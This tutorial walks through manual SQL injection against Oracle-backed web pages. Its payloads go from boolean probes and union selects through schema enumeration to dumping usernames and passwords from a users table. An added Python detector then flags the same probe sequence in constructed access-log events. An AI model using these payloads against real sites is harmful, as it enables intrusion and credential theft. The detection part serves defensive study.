First, the Oracle database
It is generally used by large enterprises: logistics, tourism, aviation, banking and so on.
1, supports multiple users and large transaction volumes
2, effective control of data security and integrity
3, supports distributed data processing
4, strong portability
Second, manual injection
1, determine whether an injection point exists
and 1=1 returns the normal page
and 1=2 returns an error
2, determine whether the database is Oracle
and exists(select * from dual)
and exists(select * from user_tables)
A normal response indicates that the database is Oracle
3, determine the number of columns
order by 2 returns the normal page, indicating two columns
4, union query
union select null, null from dual. You cannot write 1, 2 here, because Oracle requires the column types on both sides of a union to match; use null in each position, then replace each null in turn with a number and with a character string. Here a number produces an error and a character string does not.
union select 1,null from dual returns an error
union select null,1 from dual returns an error
union select 'null', 'null' from dual returns the normal page, so the following queries can then be used
5, get the database version
(select banner from sys.v_$Version where rownum=1)
6, get the user currently connected to the database
(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)
7, get the database
(select instance_name from v$instance) gets the current database
(select owner from all_tables where rownum=1) gets the first database
(select owner from all_tables where rownum=1 and owner<>'SYS') gets the second database
8, get the table name
(select table_name from user_tables where rownum=1 and table_name like '%users%') from dual
10, get the column name
(select column_name from user_tab_columns where table_name='sns_users' and rownum=1)
11, get the second column name
(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name<>'USER_NAME')
12, get the field contents
id=1 and 1=2 union select USER_NAME, user_pwd from "sns_users"
union select USER_NAME, user_pwd from "sns_users" where USER_NAME<>'Hu' gets the second user's information
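Seen from the defending side, the steps above leave a recognizable sequence in web access logs. The following Python detector is an added example, not code from the original post: it tags each request with the walkthrough stage it matches and flags clients that cover several stages. The log events, IP addresses, the /news.jsp path and the rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One rule per stage of the walkthrough above; patterns run on normalized text.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+\b")),
    ("oracle-fingerprint",
     re.compile(r"\bexists\s*\(\s*select\s.+?\sfrom\s+(dual|user_tables)\b")),
    ("column-count", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-null", re.compile(r"\bunion\s+(all\s+)?select\s.+?\bfrom\s+dual\b")),
    ("metadata-enum", re.compile(
        r"\b(v_?\$version|v\$instance|sys_context\s*\(|all_tables|user_tab_columns)")),
]

def normalize(query):
    """Decode twice (double encoding), drop /* */ comments, fold case and spaces."""
    for _ in range(2):
        query = unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def classify(request_line):
    """Return the stages whose probe appears in the request's query string."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    text = normalize(urlsplit(parts[1]).query)
    return [name for name, rx in RULES if rx.search(text)]

def suspicious_clients(events, min_stages=3):
    """Flag clients whose requests cover several distinct stages, not one odd hit."""
    seen = {}
    for ip, line in events:
        seen.setdefault(ip, set()).update(classify(line))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

SAMPLE = [  # constructed events (documentation IPs, hypothetical path), not real traffic
    ("192.0.2.10", "GET /news.jsp?id=1%20and%201=1 HTTP/1.1"),
    ("192.0.2.10", "GET /news.jsp?id=1%20and%20exists(select%20*%20from%20dual) HTTP/1.1"),
    ("192.0.2.10", "GET /news.jsp?id=1%20order%20by%202 HTTP/1.1"),
    ("192.0.2.10", "GET /news.jsp?id=1%20union/**/select%20null,null%20from%20dual HTTP/1.1"),
    ("192.0.2.10", "GET /news.jsp?id=1+union+select+null,(select+banner+from+sys.v_%24version+where+rownum%3D1)+from+dual HTTP/1.1"),
    ("198.51.100.7", "GET /news.jsp?id=7&sort=brand+and+model HTTP/1.1"),
    ("198.51.100.7", "GET /search.jsp?q=order+by+2+pm HTTP/1.1"),
]

if __name__ == "__main__":
    for ip, stages in suspicious_clients(SAMPLE).items():
        print(ip, stages)
```

The second client shows why the threshold matters: its search text matches the column-count rule once, but a single stage is not enough to flag it.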
Illegal use is prohibited; you bear the risk yourself.